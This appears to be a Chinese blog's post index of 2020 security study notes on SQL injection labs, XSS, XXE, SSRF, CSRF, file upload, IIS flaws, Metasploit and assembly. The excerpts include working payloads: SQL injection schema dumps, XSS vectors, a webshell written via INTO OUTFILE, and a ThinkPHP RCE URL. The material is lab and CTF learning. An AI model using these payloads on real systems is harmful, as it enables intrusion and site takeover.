摘要:

阅读全文
posted @ 2020-05-06 20:13
10nnn4R
阅读(174)
推荐(0)
摘要:
https://www.bilibili.com/video/BV1Ft41187ZX php反序列化原理 php序列化与反序列化基础 序列化与反序列化 序列化:将变量转换为可保存或传输的字符串的过程 反序列化:在适当的时候把这个字符串转化为原来的变量使用 php序列化与反序列化函数 seriali
阅读全文
posted @ 2020-05-03 21:16
10nnn4R
阅读(153)
推荐(0)
摘要:
跨域资源共享(CORS)漏洞详解 浏览器同源策略 同协议,同端口同域名 不运行别的网站访问该网站资源 两种跨域方法 JSONP跨域请求 原理 https://www.cnblogs.com/znyu/p/6839617.html jsonp利用script标签具有跨域能力的特点,允许用户通过scri
阅读全文
posted @ 2020-05-03 19:40
10nnn4R
阅读(2619)
推荐(0)
摘要:
XXE 概述 XXE也叫做XML外部实体注入[XML External Entity] , 当XML允许引用外部实体并解析时,会导致攻击者构造恶意实体的payloadj进行攻注入攻击,导致攻击者可以读取任意文件、执行命令、攻击网站、以及进行SSRF攻击等 ## XML基础 XML声明: < ?xml
阅读全文
posted @ 2020-05-03 17:41
10nnn4R
阅读(172)
推荐(0)
摘要:
可能出现的场景 远程图片下载 DZ 3.2 加载远程文件 离线下载 百度网盘 迅雷 远程头像 网页翻译 服务器可以发起请求的地方 常见过滤与绕过 正则过滤指定网址(url必须有bugbank) http用户名绕过: www.bugbank@baidu.com 多级域名:www.bugbank.com
阅读全文
posted @ 2020-05-03 16:37
10nnn4R
阅读(119)
推荐(0)
摘要:
自动化生成poc burpsuite CSRF使用方法 POST Burpsuite生成poc-->js代码提交 JSON劫持攻击 CSRF蠕虫 flash CSRF csrf+xss组合拳 CSRF绕过referer 1.Refere为空条件下 - 利用ftp://,http://,https:/
阅读全文
posted @ 2020-05-03 15:54
10nnn4R
阅读(161)
推荐(0)
摘要:
粗略的参考以下内容学习了一下,以后再深究... https://xz.aliyun.com/t/7405 http://wiki.0-sec.org/ ssrf概述 风险函数 file_get_contents()、fsockopen()、curl_exec()、fopen()、readfile()
阅读全文
posted @ 2020-05-03 12:19
10nnn4R
阅读(477)
推荐(0)
摘要:
概述 xss分类 反射型 :url里面 存储型:存到某种介质里面;留言板 dom型:与反射型xss类似.由js插入到页面 修复: HTML 实体编码 使用白名单 根据业务场景对症下药 黑名单 存储型xss 原理 实战 能输入的地方:发帖,评论,个人签名,文章标题 寻找思路:用户能够输入的地方都有可能
阅读全文
posted @ 2020-05-02 20:14
10nnn4R
阅读(468)
推荐(0)
摘要:
方案一 转载于 攻防世界WP https://adworld.xctf.org.cn/task/writeup?type=web&id=5417&number=3&grade=1&page=1 题目链接https://adworld.xctf.org.cn/task/answer?type=web&
阅读全文
posted @ 2020-05-02 20:10
10nnn4R
阅读(1074)
推荐(0)
摘要:
http://test.ctf8.com/ level1 借助window.alert()函数完成任务 http://test.ctf8.com/level1.php?name=<script>alert('123')</script> level2 输入框输入test后 Ctrl+g搜索源码中的t
阅读全文
posted @ 2020-05-02 20:09
10nnn4R
阅读(337)
推荐(0)
摘要:
printf函数 printf("%d", num); 汇编代码调用过程: 0071183F mov eax,dword ptr [num] 00711842 push eax 00711843 push offset string "%d" (0717B30h) 00711848 call _pr
阅读全文
posted @ 2020-05-01 16:46
10nnn4R
阅读(243)
推荐(0)
摘要:
概述 学习汇编的意义 开发时调试 逆向时的代码阅读 某些特殊技术的使用(shellcode,壳) 16/32/64汇编的区别 栈的作用: 存储数据 保存寄存器环境 传递参数 lea eax,dword ptr ss:[esp-4] 将 ss:[esp-4] 传入eax(传址) xchg eax,dw
阅读全文
posted @ 2020-05-01 14:48
10nnn4R
阅读(206)
推荐(0)
摘要:
Bypass Mixed Case(混合大小写) <Svg OnLoad=alert(1)> <Script>alert(1)</Script> Unclosed Tags 利用未闭合的标签绕过 Use in HTML injections to avoid filtering based in t
阅读全文
posted @ 2020-04-30 17:34
10nnn4R
阅读(938)
推荐(0)
摘要:
简介 GitHub地址:https://github.com/Tj1ngwe1/upload-labs 有关php文件上传 PHP $_FILES函数详解: (https://www.cnblogs.com/laijinquan/p/8682282.html)https://www.cnblogs.
阅读全文
posted @ 2020-04-29 19:35
10nnn4R
阅读(507)
推荐(0)
摘要:
XSS Cheat Sheet BASICS HTML注入 当输入位于HTML标记的属性值内或标记的外部(下一种情况中描述的标记除外)时使用。如果输入在HTML注释中,则在payload前加上“-->” <svg onload=alert(1)> "><svg onload=alert(1)> HT
阅读全文
posted @ 2020-04-29 19:16
10nnn4R
阅读(488)
推荐(0)
摘要:
第一章 进制、寄存器与汇编指令(汇编与C语言相结合) 3000元 学习汇编能做什么(逆向,游戏安全,加固/脱壳,反病毒,漏洞挖掘等等必备基础) 1.1 计算机的基本构造及其运行原理 1.2 不同进制的书写方法 1.3 为什么计算机要用二进制 1.4 不同进制间如何运算1 1.5 不同进制间如何运算2
阅读全文
posted @ 2020-04-28 20:23
10nnn4R
阅读(194)
推荐(0)
摘要:
方案一:(手机电脑在同一wifi下) 打开burp设置代理 这里的ip为电脑的ip 手机手动设置代理为电脑的ip+8080 导入证书 电脑上下载下证书(http://burp) 传到手机上
阅读全文
posted @ 2020-04-28 18:13
10nnn4R
阅读(292)
推荐(0)
摘要:
1.更新 apt-get update:更新源 apt-get upgrade:更新软件包 apt-get dist-upgrade:升级系统 2. Metasploit基础 2.1专业名词 Auxiliaries(辅助模块) 扫描,嗅探,指纹识别 Exploit(漏洞利用模块) 针对漏洞进行攻击
阅读全文
posted @ 2020-04-28 11:19
10nnn4R
阅读(230)
推荐(0)
摘要:
来自山丘安全实验室 陈毅 https://www.cnblogs.com/sec875/articles/12243725.html linux下载与更新 apt-get update apt-get install metasploit-framework 启动metaspliot postgre
阅读全文
posted @ 2020-04-27 18:17
10nnn4R
阅读(159)
推荐(0)
摘要:
IIS Internet Information Services--windows 解析漏洞 IIS 6.x 基于文件名:该版本默认会将 *.asp;.jpg 此种格式的文件名,当成 Asp 解析,原理是 服务器默认不解析 ; 号及其后面的内容,相当于截断。 基于文件夹名:该版本 默认会将 *.a
阅读全文
posted @ 2020-04-22 10:33
10nnn4R
阅读(149)
推荐(0)
摘要:
本文为转载,原文地址:http://www.2cto.com/article/201307/228165.html IIS WebDAV安全配置 2013-07-16 12:13:00 作者:瞌睡龙收藏 我要投稿 0x00 简介 WebDAV是一种基于 HTTP 1.1协议的通信协议.它扩展了HTT
阅读全文
posted @ 2020-04-21 18:45
10nnn4R
阅读(1164)
推荐(0)
摘要:
内容来自: https://ca0y1h.top/ 联合查询注入 使用场景 页面上有显示位 什么是显示位:在一个在一个网站的正常页面,服务端执行SQL语句查询数据库中的数据,客户端将数据展示在页面中,这个展示数据的位置就叫显示位 。 payload ?id=1' order by 数值 --+ ?i
阅读全文
posted @ 2020-04-21 17:23
10nnn4R
阅读(200)
推荐(0)
摘要:
less18 user-agent的注入 源码分析: check_input对name,password进行了过滤 function check_input($value) { if(!empty($value)) { // truncation (see comments) $value = su
阅读全文
posted @ 2020-03-22 14:14
10nnn4R
阅读(245)
推荐(0)
摘要:
less15 试了很多符号,页面根本不显示别的信息,猜测为盲注 可是怎么检测闭合? 万能密码登录 最终试出来’闭合 uname=1’ or 1=1 # 接下来就要工具跑 less16 同上用万能密码试闭合,工具/脚本跑 less-17 原理https://www.cnblogs.com/laoxia
阅读全文
posted @ 2020-03-21 20:16
10nnn4R
阅读(268)
推荐(0)
摘要:
less11 抓包 ’ " 实验发现’构成闭合,存在注入点 less-12 a,b都有注入点,b比较好判断闭合 less13 less14
阅读全文
posted @ 2020-03-19 17:28
10nnn4R
阅读(203)
推荐(0)
摘要:
less-7 https://www.jianshu.com/p/20d1282e6e1d ?id=0’)) union select 1,‘2’,’<?php @eval($_POST["cmd"]);?>’ into outfile ‘D:\phpstudy\WWW\sqli\Less-7\te
阅读全文
posted @ 2020-03-19 17:10
10nnn4R
阅读(115)
推荐(0)
摘要:
less-5 基于报错的注入 基于报错可以爆出当前数据库名等等 id=2’ and extractvalue(1, concat(0x7c,(select user())));-- # ?id=2’ and extractvalue(1, concat(0x7c,(select @@version)
阅读全文
posted @ 2020-03-15 16:26
10nnn4R
阅读(137)
推荐(0)
摘要:
less-1 爆库 id=1222’ union select 1,group_concat(schema_name),database() from information_schema.schemata –+# 爆表 ?id=1222’ union select 1,group_concat(t
阅读全文
posted @ 2020-03-15 15:27
10nnn4R
阅读(140)
推荐(0)
摘要:
闭合条件的探测 数字型注入 burp抓包 分别测试 id=1 and 1=1和id=1 or 1=1 存在漏洞 字符型注入 ’ 报错 探测闭合条件 ’ order by 1# 未报错.构成闭合 同上有两处查询信息 搜索型 xx型 先构造’ xx# 根据报错很容易写出闭合 payload ')unio
阅读全文
posted @ 2020-03-14 17:53
10nnn4R
阅读(170)
推荐(0)
摘要:
手工注入 查询所有数据库名称和表名 ’ union select 1,table_schema,table_name from information_schema.tables# 发现就两个数据库information_schema与news 查询news数据库中的表的名称 ’ union sel
阅读全文
posted @ 2020-03-08 16:23
10nnn4R
阅读(221)
推荐(0)
摘要:
分类: 可分为数字型和字符型 直接查id与查字段的区别 sql检测 数字型: select * from table where id=1 and 1=1不报错 select * from table where id=1 and 1=2 报错 字符型 关键在闭合与SQL语句及注释 select *
阅读全文
posted @ 2020-03-08 15:40
10nnn4R
阅读(112)
推荐(0)
摘要:
payload5.0.24 http:// /index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=test.php&vars[1][]
阅读全文
posted @ 2020-03-05 18:36
10nnn4R
阅读(134)
推荐(0)
摘要:
ls 英文原意:list 命令路径: /bin/ls 权限:所有用户 功能:显示目录文件 语法:ls 选项[-ald] [文件或目录] -a all 所有文件 -l long 详细显示文件 -d 查看目录属性 -i 查看id mkdir 创建新目录 mkdir -p [目录名] 创建新目录 -p 递
阅读全文
posted @ 2020-02-28 14:31
10nnn4R
阅读(192)
推荐(0)
摘要:
https://tool.lu/pyc/在线反编译pyc import base64 correct = 'XlNkVmtUI1MgXWBZXCFeKY+AaXNt' flag = base64.b64decode(correct) def decode(message): s = '' for i
阅读全文
posted @ 2020-02-23 12:54
10nnn4R
阅读(203)
推荐(0)
摘要:
堆的调试实验 调试态堆管理策略和常态堆管理策略:前者只使用空表不用块表,不真实 使用调试器加载函数会触发前者 __asm int3 调试最真实的栈 未启用块表的堆区信息 堆区起始位置(假设为0x00520000) 起始位置开始依次是段表索引,虚表索引,空表使用标识和空表索引区 空表索引区的位置是偏移
阅读全文
posted @ 2020-02-22 17:14
10nnn4R
阅读(236)
推荐(0)
摘要:
基本概念 堆块:堆区内存的基本单位 包括两个部分:块首,块身 块首:标识这个堆块自身的信息:如大小,是否被占用等 块身:分配给用户使用的数据区 堆表:一般位于堆区的起始位置,用于索引堆区所有堆块的信息,包括大小,是否被占用等. 占用态的堆块被使用它的程序索引,堆表只索引所有空闲态的堆块. 堆表分为空
阅读全文
posted @ 2020-02-22 16:08
10nnn4R
阅读(208)
推荐(0)
摘要:
PDO project data object 连接到数据库 $db=new PDO("mysql:dbname=database;host=sever","username","password") example: $db=new PDO("mysql:dbname=imdb;host=loca
阅读全文
posted @ 2020-02-19 15:14
10nnn4R
阅读(274)
推荐(0)
摘要:
ISO 应用层 为应用软件提供接口,使应用程序能够使用网络服务。 各种应用程序协议如HTTP(Web),Telnet(远程控制),FTP(文本传输) 表示层 数据的交换格式、数据加密解密、数据的压缩解压缩 数据编码的处理如ASCII,GBK 保证一个系统应用层发出的信息可被另一系统的应用层读出 会话
阅读全文
posted @ 2020-02-18 20:58
10nnn4R
阅读(168)
推荐(0)
摘要:
数据库基础 常见的数据库模型 层次(树状)模型 网状模型 关系模型 关系型数据库 由相互关联的表通过共享属性构建数据的一种方法 一个数据库由若干张表组成 表中的行称为记录,列称为记录的属性 关系型数据库主要通过SQL去定义,管理及查询数据 RDBMS 关系型数据库的管理系统 对数据库进行管理,并能够
阅读全文
posted @ 2020-02-18 15:14
10nnn4R
阅读(168)
推荐(0)
摘要:
基本概念 php.net/函数名:可以查询函数功能 相关环境:xampp 网页文件中在xampp/htdocs 相关使用:https://www.cnblogs.com/fousor/p/9899575.html 语法 print语句 print"content"; print"<pre>text<
阅读全文
posted @ 2020-02-17 21:29
10nnn4R
阅读(132)
推荐(0)